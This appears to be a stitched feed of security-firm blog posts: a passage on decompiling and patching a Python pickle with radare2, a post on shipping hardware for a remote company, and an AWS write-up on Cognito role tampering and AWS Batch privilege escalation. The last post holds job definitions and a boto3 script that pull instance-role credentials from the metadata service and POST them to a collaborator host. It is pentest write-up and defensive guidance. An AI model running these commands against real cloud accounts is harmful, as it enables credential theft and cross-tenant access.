lJGUdWKMBmNvbmZpZ5R9lIwRX3Bvb2xfY29ubmVjdGlvbnOUSwqMDV9wb29sX21h
eHNpemWUSwqMC19wb29sX2Jsb2NrlIl1YowHaHR0cDovL5RoVymBlH2UKGhaaF0p
gZR9lChoYEsAaGFOaGKJaGNOaGROaGVOaGaPlGhoaG9ocEsAaHGIaHKIaHMpaHSI
aHUojA1hdXRob3JpemF0aW9ulJGUdWJoeH2UaHpLCmh7SwpofIl1YnWMBnN0cmVh
bZSJjAl0cnVzdF9lbnaUiIwNbWF4X3JlZGlyZWN0c5RLHnVijAdiYXNldXJslIwU
aHR0cHM6Ly9leGFtcGxlLmNvbS+UdWIu

We decode the pickle and put it in a file; let’s call it test.pickle. We then open the file with r2. We also run x to see some hex and pd to print disassembly. If you ever want to know what an r2 command does, just run the command with a ? appended to get a help menu (e.g., pd?).

$ r2 -a pickle test.pickle
 -- .-. .- -.. .- .-. . ..---
[0x00000000]> x
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00000000  8004 95bf 0500 0000 0000 008c 1172 6571  .............req
0x00000010  7565 7374 732e 7365 7373 696f 6e73 948c  uests.sessions..
0x00000020  0753 6573 7369 6f6e 9493 9429 8194 7d94  .Session...)..}.
0x00000030  288c 0768 6561 6465 7273 948c 1372 6571  (..headers...req
0x00000040  7565 7374 732e 7374 7275 6374 7572 6573  uests.structures
0x00000050  948c 1343 6173 6549 6e73 656e 7369 7469  ...CaseInsensiti
0x00000060  7665 4469 6374 9493 9429 8194 7d94 8c06  veDict...)..}...
0x00000070  5f73 746f 7265 948c 0b63 6f6c 6c65 6374  _store...collect
0x00000080  696f 6e73 948c 0b4f 7264 6572 6564 4469  ions...OrderedDi
0x00000090  6374 9493 9429 5294 288c 0a75 7365 722d  ct...)R.(..user-
0x000000a0  6167 656e 7494 8c0a 5573 6572 2d41 6765  agent...User-Age
0x000000b0  6e74 948c 1670 7974 686f 6e2d 7265 7175  nt...python-requ
0x000000c0  6573 7473 2f32 2e32 382e 3294 8694 8c0f  ests/2.28.2.....
0x000000d0  6163 6365 7074 2d65 6e63 6f64 696e 6794  accept-encoding.
0x000000e0  8c0f 4163 6365 7074 2d45 6e63 6f64 696e  ..Accept-Encodin
0x000000f0  6794 8c0d 677a 6970 2c20 6465 666c 6174  g...gzip, deflat
[0x00000000]> pd
            0x00000000      8004           proto 0x4
            0x00000002      95bf05000000.  frame 0x5bf
            0x0000000b      8c1172657175.  short_binunicode "requests.sessions" ; 0xd
            0x0000001e      94             memoize
            0x0000001f      8c0753657373.  short_binunicode "Session"  ; 0x21 ; 2'!'
            0x00000028      94             memoize
            0x00000029      93             stack_global
            0x0000002a      94             memoize
            0x0000002b      29             empty_tuple
            0x0000002c      81             newobj
            0x0000002d      94             memoize
            0x0000002e      7d             empty_dict
            0x0000002f      94             memoize
            0x00000030      28             mark
            0x00000031      8c0768656164.  short_binunicode "headers"  ; 0x33 ; 2'3'
            0x0000003a      94             memoize
            0x0000003b      8c1372657175.  short_binunicode "requests.structures" ; 0x3d ; 2'='
            0x00000050      94             memoize
            0x00000051      8c1343617365.  short_binunicode "CaseInsensitiveDict" ; 0x53 ; 2'S'
            0x00000066      94             memoize
            0x00000067      93             stack_global

From the above assembly, it appears this file is indeed a pickle. We also see requests.sessions and Session as strings, so this pickle likely imports requests and uses sessions. Let’s decompile it. We will run the command pdPf @0 ~.., which takes some explaining, since it uses a couple of r2’s features.

  • pdPf - R2pickledec uses the pdP command (see pdP?). Adding an f causes the decompiler to set r2 flags for every variable name. This will make renaming variables and jumping to interesting locations easier.

  • @0 - This tells r2 to run the command at offset 0 instead of the current seek address. This does not matter now because our current offset defaults to 0. I just make this a habit in general to prevent mistakes when I am seeking around to patch something.
  • ~.. - This is the r2 version of |less. It uses r2’s built-in pager. If you like the real less better, you can just use |less. R2 commands can be piped to any command line program.

Once we execute the command, we will see a Python-like source representation of the pickle. The code is seen below, but snipped. All comments below were added by the decompiler.

## VM stack start, len 1
## VM[0] TOP
str_xb = "__main__"
str_x16 = "Api"
g_Api_x1c = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)
str_x54 = "headers"
str_x5e = "requests.structures"
str_x74 = "CaseInsensitiveDict"
g_CaseInsensitiveDict_x8a = _find_class(str_x5e, str_x74)
str_x91 = "_store"
str_x9a = "collections"
str_xa8 = "OrderedDict"
g_OrderedDict_xb6 = _find_class(str_x9a, str_xa8)
str_xbc = "user-agent"
str_xc9 = "User-Agent"
str_xd6 = "python-requests/2.28.2"
tup_xef = (str_xc9, str_xd6)
str_xf1 = "accept-encoding"
...
str_x5c9 = "stream"
str_x5d3 = "trust_env"
str_x5e0 = "max_redirects"
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

It’s usually best to start reversing at the end with the return line. That is what is being returned from the pickle. Hit G to go to the end of the file. You will see the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

The what_x616 variable is getting returned. The what part of the name indicates that the decompiler does not know what type of object it is, because what_x616 is the result of a g_Api_x1c.__new__ call. On the other hand, g_Api_x1c gets a g_ prefix: the decompiler knows it is a global, since it comes from an import. It even adds the Api part to hint at what the import is. The x1c and x616 suffixes indicate the offsets in the pickle where the objects were created. We will use that later to patch the pickle.

Since we used flags, we can easily rename variables by renaming the corresponding flag. It might be helpful to rename g_Api_x1c to make it easier to search for. Rename the flag with fr pick.g_Api_x1c pick.api. Notice that the flag name will tab-complete. List all flags with the f command. See f? for help.

Now run pdP @0 ~.. again. Instead of g_Api_x1c, you will see api. If we search for its first use, we find the code below.

str_xb = "__main__"
str_x16 = "Api"
api = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)

Naively, _find_class(module, name) is equivalent to _getattribute(sys.modules[module], name)[0]. We can see the module is __main__ and the name is Api. So the api variable is just __main__.Api.
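A rough Python equivalent of that pseudo-call (simplified, ignoring the unpickler’s protocol-specific corner cases) looks like this:

import importlib
import sys

def find_class(module: str, name: str):
    # Import the module if it is not loaded yet, then walk to the attribute
    if module not in sys.modules:
        importlib.import_module(module)
    return getattr(sys.modules[module], name)

# The same lookup our pickle performs for collections.OrderedDict
odict = find_class("collections", "OrderedDict")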

In this snippet of code, we see the requests session being imported. You may have noticed the baseurl field in the previous snippet. It looks like this object contains a session for making backend API requests. Can we steal something good from it? Googling for “requests session basic authentication” turns up the auth attribute. Let’s look for “auth” in our pickle.

str_x30e = "auth"
str_x315 = "admin"
str_x31d = "Pickles are fun"
tup_x32f = (str_x315, str_x31d)
str_x331 = "proxies"
dict_x33b = {}
...
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}

It might be helpful to rename variables for understanding, or run pdP > /tmp/pickle_source.py to get a .py file to open in your favorite text editor. In short, though, the above code sets up the dictionary dict_x51, where the auth element is set to the tuple ("admin", "Pickles are fun").

We just stole the admin credentials!

Patching

Now, I don’t recommend doing this on a real pentest, but let’s take things further. We can patch the pickle to use our own malicious webserver. We first need to find the current URL, so we search for “https” and find the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = api.__new__(g_Api_x1c, *())

So the baseurl of the API is set to https://example.com/. To patch this, we seek to where the URL string is created. We can use the x5fe in the variable name to know where the variable was created, or we can just seek to the pick.str_x5fe flag. When seeking to a flag in r2, you can tab-complete the flag name. Notice the prompt changes its location number after the seek command.

[0x00000000]> s pick.str_x5fe
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600

Let’s overwrite this URL with https://doyensec.com/. The below Radare2 commands are commented so you can understand what they are doing.

[0x000005fe]> oo+ # reopen file in read/write mode
[0x000005fe]> pd 3 # double check what next instructions should be
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600
            0x00000614      94             memoize
            0x00000615      75             setitems
[0x000005fe]> r+ 1 # add one extra byte to the file, since our new URL is slightly longer
[0x000005fe]> wa short_binunicode "https://doyensec.com/"
INFO: Written 23 byte(s) (short_binunicode "https://doyensec.com/") = wx 8c1568747470733a2f2f646f79656e7365632e636f6d2f @ 0x000005fe
[0x000005fe]> pd 3     # double check we did not clobber an instruction
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600
            0x00000615      94             memoize
            ;-- pick.what_x616:
            0x00000616      75             setitems
[0x000005fe]> pdP @0 |tail      # check that the patch worked
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://doyensec.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x617 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x617.__setstate__(dict_x21)
return what_x617

JSON and Automation

Imagine this is just the first of 100 files and you want to patch them all. Radare2 is easy to script with r2pipe. Most commands in r2 have a JSON variant, obtained by appending a j. In this case, pdPj will produce an AST in JSON, complete with offsets. Using this, you can write a parser that automatically finds the baseurl element of the returned api object, gets its offset, and patches it.
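As a minimal sketch of that approach (it only locates candidate URL strings in test.pickle; the patching step itself is left out), one could do:

import r2pipe

def iter_nodes(node):
    # The AST mixes dicts and lists, so recurse into both
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from iter_nodes(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_nodes(value)

r2 = r2pipe.open("test.pickle", flags=["-a", "pickle"])
ast = r2.cmdj("pdPj")  # decompile to a JSON AST

for n in iter_nodes(ast):
    if n.get("type") == "PY_STR" and "https://" in str(n.get("value", "")):
        print(hex(n["offset"]), n["value"])  # candidate string to patch

r2.quit()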

JSON can also be helpful without r2pipe, because r2 has a bunch of built-in features for dealing with JSON. For example, we can pretty-print JSON with ~{}, but for this pickle that would produce 1492 lines of output. Better yet, use r2’s internal gron output with ~{=} and grep for what you want.

[0x000005fe]> pdPj @0 ~{=}https
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[1][1].value[1].args[0].value[0][1].value[1].args[0].value[10][1].value[0].value = "https";
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[8][1].value[1].args[0].value = "https://";
json.stack[0].value[1].args[0].value[1][1].value = "https://doyensec.com/";

Now we can use the resulting JSON path to find the offset of the doyensec.com URL.

[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].value}
https://doyensec.com/
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1]}
{"offset":1534,"type":"PY_STR","value":"https://doyensec.com/"}
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}
1534
[0x00000000]> s `pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}` ## seek to address using subcommand
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600

Don’t forget you can also pipe to external commands. For instance, pdPj | jq can be used to search the AST for arbitrary patterns, such as returning all objects whose type is PY_GLOBAL.

Conclusion

The r2pickledec plugin simplifies reversing Python pickles. Because it is an r2 plugin, you get all of r2’s features for free, and we’ve barely scratched the surface of what r2 can do. If you’d like to learn more, check out the r2 book. Be sure to keep an eye out for my next post, where I will dig into Python pickle obfuscation techniques.

Logistics for a Remote Company

5 June 2023 at 22:00

Logistics and shipping devices across the world can be a challenging task, especially when dealing with customs regulations. For the past few years, I have had the opportunity to learn about these complex processes and how to manage them efficiently. As a Practice Manager at Doyensec, I was responsible for building processes from scratch and ensuring that our logistics operations ran smoothly.

Since 2018, I have had to navigate the intricate world of logistics and shipping, dealing with everything from international regulations to customs clearance. Along the way, I have learned valuable lessons and picked up essential skills that have helped me manage complex logistics operations with ease.

Logistics for a Remote Company

In this post, I will share my experiences and insights on managing shipping devices across the world, dealing with customs, and building efficient logistics processes. Whether you’re new to logistics or looking to improve your existing operations, my learnings and experiences will prove useful.

Employee Onboarding

At Doyensec, when we hire a new employee, our HR specialist takes care of all the necessary paperwork, while I focus on logistics. This includes creating a welcome package and shipping all the necessary devices to the employee’s location. While onboarding employees from the United States and European Union is relatively easy, dealing with customs regulations in other countries can be quite challenging.

For instance, shipping devices from/to countries such as the UK (post Brexit), Turkey, or Argentina can be quite complicated. We need to be aware of the customs regulations in these countries to ensure that our devices are not bounced back or hit with exorbitant customs fees.

Navigating customs regulations in different countries can be a daunting task. Still, we’ve learned that conducting thorough research beforehand and ensuring that our devices comply with the necessary regulations can help avoid any unnecessary delays or fees. At Doyensec, we believe that providing our employees with the necessary tools and equipment to perform their job is essential, and we strive to make this process as seamless as possible, regardless of where the employee is located.

Testing Hardware Management

At Doyensec, dealing with testing hardware is a crucial aspect of our operations. We use a variety of testing equipment for our work. This means that we often have to navigate customs regulations, including the payment of customs fees, to ensure that our laptops, YubiKeys and mobile devices arrive on time.

To avoid delays in conducting security audits, we often choose to pay additional fees, including VAT and customs charges, to ensure that we receive hardware promptly. We understand that time is of the essence, and we prioritize meeting our clients’ needs, even if it means spending more money to ensure items required for testing are not held up at customs.

In addition to paying customs fees, we also make sure to keep all necessary documentation for each piece of hardware that we manage. This documentation helps us to speed up further processes and ensures that we can quickly identify and locate each and every piece of hardware when needed.

The hardware we deal with most frequently is laptops, though we occasionally ship YubiKeys as well. Fortunately, YubiKeys generally do not cause problems at customs (given their low market value), and we can usually receive them without any significant issues.

Over time, we’ve learned that different shipping companies have different approaches to customs regulations. To ensure that we can deliver quality service to our clients, we prefer to use companies that we know will treat us fairly and deliver hardware on time. We have almost always had a positive experience with DHL as our preferred shipping provider. DHL’s automated customs processes and documentation have been particularly helpful in ensuring smooth and efficient shipping of Doyensec’s hardware and documents across the world. DHL’s reliability and efficiency have been critical in allowing Doyensec to focus on its core business, which is finding bugs for our fantastic clients.

We have a preference for avoiding local post office services when it comes to shipping our hardware or documents. While local post office services may be slightly cheaper, they often come with more problems. Packages may get stuck somewhere during the delivery process, and it can be difficult to follow up with customer service to resolve the issue. This can lead to delayed deliveries, frustrated customers, and ultimately, a negative impact on the company’s reputation. Therefore, Doyensec opts for more reliable shipping options, even if they come with a slightly higher price tag.

2022 Holiday Gifts from Japan

At Doyensec, we believe in showing appreciation for our employees and their hard work. That’s why we decided to import some gifts from Japan to distribute among our team members. However, what we did not anticipate was the range of customs fees that we would encounter while shipping these gifts to different countries.

We shipped these gifts to 7 different countries, all through the same shipping company. However, we found that customs officers took different approaches, even within the same country. As a result, the customs fees varied from 0 to 45 euros per package.

The interesting part was that every package had the same invoice from the Japanese manufacturer attached, but the fees still differed significantly. It was challenging to understand why this was the case, and we still don’t have a clear answer.

Overall, our experience with importing gifts from Japan highlighted the importance of being prepared for unexpected customs fees and the unpredictability of customs regulations.

Conclusion

Managing devices and shipping packages to team members at a globally distributed company, even with a small team, can be quite challenging. Ensuring that packages are delivered promptly and to the correct location can be very difficult, especially with tight project deadlines.

Although it would be easier to manage devices if everyone worked from the same office, at Doyensec, we value remote work and the flexibility that it provides. That’s why we have invested in developing processes and protocols to ensure that our devices are managed efficiently and securely, despite the remote working environment.

While some may argue that these challenges are reason enough to abandon remote work and return to the office, we believe that the benefits of remote work far outweigh any challenges we may face. At Doyensec, remote work allows us to hire talented individuals from across the EU, the US, and Canada, offering a diverse and inclusive work environment. Remote work also allows for greater flexibility and work-life balance, which can result in happier and more productive employees.

In conclusion, while managing devices in a remote work environment can be challenging, we believe that the benefits of remote work make it worthwhile. At Doyensec, we have developed strategies to manage devices efficiently, and we continue to support remote work and its many benefits.

Messing Around With AWS Batch For Privilege Escalations

12 June 2023 at 22:00

CloudsecTidbit

From The Previous Episode… Have you solved the CloudSecTidbit Ep. 2 IaC lab?

Solution

The challenge for the AWS Cognito CloudSecTidbit is essentially to escalate privileges to admin and read the internal users list.

The application uses AWS Cognito to issue a session token saved as a cookie with the name aws-cognito-app-access-token.

The JWT is a valid AWS Cognito user token, usable to interact with the service. It is possible to retrieve the current user attributes with the command:

aws cognito-idp get-user --region us-east-1 --access-token <USER_ACCESS_TOKEN>
{
    "Username": "francesco",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "5139e6e7-7a37-4e6e-9304-8c32973e4ac0"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "francesco"
        },
        {
            "Name": "custom:Role",
            "Value": "user"
        },
        {
            "Name": "email",
            "Value": "[email protected]"
        }
    ]
}

Then, because of the default READ/WRITE permissions on the user attributes, the attacker is able to tamper with the custom:Role attribute and set it to admin:

aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:Role,Value=admin" --access-token <USER_ACCESS_TOKEN>

After that, by refreshing the authenticated tab, the user is now recognized as an admin.

That happens because the vulnerable platform trusts the custom:Role attribute to evaluate the authorization level of the user.
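The same inspect-and-tamper flow is easy to script with boto3 - a minimal sketch, using the access token captured from the aws-cognito-app-access-token cookie (these Cognito operations are authorized by the token itself, so no AWS credentials are needed):

import boto3

token = "<USER_ACCESS_TOKEN>"  # value of the aws-cognito-app-access-token cookie
idp = boto3.client("cognito-idp", region_name="us-east-1")

# Equivalent of `aws cognito-idp get-user`
user = idp.get_user(AccessToken=token)
print({a["Name"]: a["Value"] for a in user["UserAttributes"]})

# Overwrite the attribute the backend trusts for authorization decisions
idp.update_user_attributes(
    AccessToken=token,
    UserAttributes=[{"Name": "custom:Role", "Value": "admin"}],
)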

Tidbit No. 3 - Messing around with AWS Batch For Privilege Escalations

Q: What is AWS Batch?

  • A set of batch management capabilities that enable developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS.

  • AWS Batch dynamically provisions the optimal quantity and type of compute resources (e.g. CPU or memory optimized compute resources) based on the volume and specific resource requirements of the batch jobs submitted.

  • With AWS Batch, there is no need to install and manage batch computing software or server clusters, allowing you to instead focus on analyzing results and solving problems.

  • AWS Batch plans, schedules, and executes your batch computing workloads using Amazon EC2 (available with Spot Instances) and AWS compute resources with AWS Fargate or Fargate Spot.

Summarizing the previous points: it is a managed, self-scaling scheduler for tasks.

Its main components are:

  • Jobs. The unit of work; they can be shell scripts, executables, or container images submitted to AWS Batch.

  • Job definitions. They are blueprints for the tasks. It is possible to grant them IAM roles to access AWS resources, set their memory and CPU requirements, and even control container properties like environment variables or mount points for persistent storage.

  • Job Queues. Submitted jobs are stacked in queues until they are scheduled onto a compute environment. Job queues can be associated with multiple compute environments and configured with different priority values.

  • Compute environments. Sets of managed or unmanaged compute resources that are usable to run jobs. With managed compute environments, you can choose the desired compute type (Fargate, EC2 and EKS) and deeply configure its resources. AWS Batch launches, manages, and terminates compute types as needed. You can also manage your own compute environments, but you’re responsible for setting up and scaling the instances in an Amazon ECS cluster that AWS Batch creates for you.

The scheme below (taken from the AWS documentation) shows the workflow for the service.

After a first look at AWS Batch basics, we can introduce the core differences in the managed compute environment types.

Orchestration Types In Managed Compute Environments

Fargate

AWS Batch jobs can run on AWS Fargate resources. AWS Fargate uses Amazon ECS to run containers and orchestrates their lifecycle.

This configuration fits cases where control over the host machine running the container task is not needed. All the logic is embedded in the task and there is no need to add context from the host machine.

EC2

AWS Batch jobs can run on Amazon EC2 instances. It allows particular instance configurations like:

  • Settings for vCPUs, memory and/or GPU
  • Custom Amazon Machine Image (AMI) with launch templates
  • Custom environment parameters

This configuration fits scenarios where it is necessary to customize and control the containers’ host environment. As an example, you may need to mount an Elastic File System (EFS) and share some folders with the running jobs.

EKS

AWS Batch doesn’t create, administer, or perform lifecycle operations of the EKS clusters. AWS Batch orchestration scales up and down nodes managed by AWS Batch and runs pods on those nodes.

The considerations are similar to the ECS case.

Running Tasks With Two Metadata Services & Two Roles - The Unwanted Role Exposition Case

While testing a multi-tenant platform, we managed to leverage AWS Batch to compromise the cloud environment and perform privilege escalation.

The single tenants were using AWS Batch to execute some computational work given a certain input to be processed (tenant data).

The task jobs of all tenants were initialized and executed using the EC2 orchestration type; hence, all batch containers were running on the same task-runner EC2 instances.

The scheme below describes the observed scenario at a high level.

The tenant data (input) was mounted on the EC2 spot instance prior to the execution with Elastic File System (EFS). As can be seen in the design scheme, the specific tenant input data was shared with the batch job containers via dedicated shared folders.

This might seem like a secure and well-isolated environment, but it wasn’t.

In order to illustrate the final exploitation, a few IAM concepts about the vulnerable context must be explained:

  • Within the described design, the compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data

  • The task containers (batch jobs) had an execution role with the batch:RegisterJobDefinition and batch:SubmitJob permissions.

The Testing Phase

So, during testing, we obviously tried to execute code in the jobs to get access to some internal AWS credentials. Since the Instance Metadata Service (IMDSv2) was network-restricted in the running containers, it was not possible to get an easy win by reaching 169.254.169.254 (the IMDS IP).

Nevertheless, containers running in ECS and EKS have the Container Metadata Service (CMDS) running and reachable at 169.254.170.2 (did you know?). It is literally the doppelganger of the IMDS service, but for containers and pods in AWS.

Thanks to it, we were able to gather information about the running task. By looking at the AWS documentation, you can learn more about the many environment variables exposed to the running container. Among them, there is AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.

In fact, the CMDS protects users against SSRF interactions by exposing the credentials endpoint at a dynamic path saved in an environment variable. By doing so, basic SSRF payloads cannot guess its pseudo-random part and retrieve credentials.

The screenshot below shows an interaction with the CMDS to get the credentials from a running container (our execution context).
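For reproduction purposes, the same lookup can be done from inside a compromised job with a few lines of Python - a minimal sketch relying only on the standard CMDS endpoint and environment variable:

import os
import requests

# Inside an ECS/Batch container, the task credentials sit behind a
# per-task pseudo-random path disclosed only through this environment
# variable - which is exactly why a blind SSRF cannot guess it.
relative_uri = os.environ["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]
creds = requests.get(f"http://169.254.170.2{relative_uri}", timeout=5).json()

# Temporary credentials for the task (job) role
print(creds["RoleArn"], creds["AccessKeyId"], creds["Expiration"])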

At this point, we had the credentials for the ecs-role owned by the running jobs.

Among the ECS-related execution permissions, it had RegisterJobDefinition, SubmitJob and DescribeJobQueues for the AWS Batch service.

Since the basic threat model assumed that users had command execution on the running containers, a certain level of control over the job definitions was not an issue.

Hence, having the RegisterJobDefinition and SubmitJob permissions exposed in the user-controlled context was not considered a vulnerability in the first place.

So, the next question was pretty obvious:

The Turning Point

After many hours of dorking and code review, we managed to discover two additional details:

  • In the AWS Batch with EC2 compute environment, the jobs’ containers run with host network configuration. This means that Batch job containers use the host EC2 Spot instance’s networking directly
  • The platform was restricting the IMDS connectivity on job containers when the worker was starting the tasks

Due to these conditions, a batch job could call the IMDSv2 service on behalf of the host EC2 Spot instance if it started without the restrictions applied by the worker, potentially leading to a privilege escalation:

  1. An attacker with the leaked batch job credentials could use RegisterJobDefinition and SubmitJob to define and execute a malicious AWS Batch job.

  2. The malicious job is able to communicate with the IMDS service on behalf of the host EC2 Spot instance, since the network restrictions to the IMDS were not applied.

  3. In this way, it was possible to obtain credentials for the IAM Role owned by the EC2 Spot instances.

As mentioned earlier, the compute environment’s EC2 Spot instances needed a role with highly privileged permissions to manage multiple services, including the EFS used to mount customers’ data.

PrivEsc Exploitation

The exploitation phase required two job definitions to interact with the IMDSv2, one to get the instance IAM role name, and one to retrieve the IAM security credentials for the leaked role name.

Job Definition 1 - Getting the host EC2 Spot instance role name

$ aws batch register-job-definition --job-definition-name poc-get-rolename --type container --container-properties '{ "image": "curlimages/curl", "vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

After defining the job definition, submit a new job using the newly created job definition:

aws batch submit-job --job-name attacker-jb-getrolename --job-queue LowPriorityEc2 --job-definition poc-get-rolename --scheduling-priority-override 999 --share-identifier asd

Note: the job queue name was retrievable with aws batch describe-job-queues

The attacker collaborator server received something like:

POST /exfil HTTP/1.1
Host: fo78ichlaqnfn01sju2ck6ixwo2fqaez.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

iam-instance-role-20230322003148155300000001

Job Definition 2 - Getting the credentials for the host EC2 Spot instance role

$ aws batch register-job-definition --job-definition-name poc-get-aimcreds --type container --container-properties '{ "image": "curlimages/curl", "vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

As with the previous definition, after submitting the job, the collaborator received the output.

POST /exfil HTTP/1.1
Host: 4otxi1haafn4np1hjj21kvimwd24qyen.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 1430
Content-Type: application/x-www-form-urlencoded

{"RoleArn":"arn:aws:iam::1235122316123:role/ecs-role","AccessKeyId":"<redacted>","SecretAccessKey":"<redacted>","Token":"<redacted>","Expiration":"2023-03-22T06:54:42Z"}

This time it contained the AWS credentials for the host EC2 Spot instance role.

Privilege escalation achieved! The obtained role allowed us to access other tenants’ data and do much more.
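For convenience, the same two-step chain can also be scripted with boto3 using the leaked job credentials - a minimal sketch, where the queue name, role name and collaborator host are the placeholders from the commands above:

import boto3

# Runs with the leaked job credentials (e.g. exported in the environment)
batch = boto3.client("batch", region_name="us-east-1")

# Same payload as the CLI examples: read the role credentials from the
# host IMDSv2 and POST them to the attacker-controlled collaborator
exfil_cmd = (
    "TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token "
    "-H X-aws-ec2-metadata-token-ttl-seconds:21600`; "
    "curl -s -H X-aws-ec2-metadata-token:$TOKEN "
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME "
    "> /tmp/out; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil"
)

batch.register_job_definition(
    jobDefinitionName="poc-get-creds",
    type="container",
    containerProperties={
        "image": "curlimages/curl",
        "vcpus": 1,
        "memory": 20,
        "command": ["sh", "-c", exfil_cmd],
    },
)

batch.submit_job(
    jobName="attacker-jb-getcreds",
    jobQueue="LowPriorityEc2",  # retrievable via describe_job_queues()
    jobDefinition="poc-get-creds",
    shareIdentifier="asd",
    schedulingPriorityOverride=999,
)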

Default Host Network Mode In AWS Batch With EC2 Orchestration

In AWS Batch with EC2 compute environments, the containers run with the host network mode by default.

With such configuration, the containers (batch jobs) have access to both the EC2 IMDS and the CMDS.

The issue lies in the fact that the container job is able to talk to the IMDSv2 service on behalf of the EC2 Spot instance, because they share the same network interface.

In conclusion, it is very important to know about such behavior and avoid the possibility of introducing privilege escalation patterns while designing cloud environments.

For cloud security auditors

When the platform uses AWS Batch compute environments with EC2 orchestration, work through the following considerations and questions:

  • Always consider the security of the AWS Batch jobs and their possible compromise. A threat actor could escalate vertically/horizontally and gain further access to the cloud infrastructure.
    • Which aspects of the job execution are controllable by the external user?
    • Is command execution inside the jobs intended by the platform?
      • If yes, investigate the permissions available through the CMDS
      • If no, attempt to achieve command execution within the jobs’ context
    • Is the IMDS restricted from the job execution context?
  • Which types of Compute Environments are used in the platform?
    • Are there any Compute Environments configured with EC2 orchestration?
      • If yes, which role is assigned to EC2 Spot Instances?

Note: The dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with EC2 launch type.

For developers

Developers should be aware that AWS Batch with EC2 compute environments runs containers with the host network configuration. Consequently, the executed containers (batch jobs) have access to both the CMDS for the task role and the IMDS for the host EC2 Spot Instance role.

In order to prevent privilege escalation patterns, Job runs must match the following configurations:

  • Having the IMDS restricted at network level in running jobs. Read the documentation here

  • Restricting the batch job execution role and job role IAM permissions. In particular, avoid assigning RegisterJobDefinition and SubmitJob permissions in job-related or accessible policies to prevent uncontrolled execution by attackers landing on the job context

If both configurations are not applicable in your design, consider changing the orchestration type.

Note: Once again, the dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with the EC2 launch type.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!


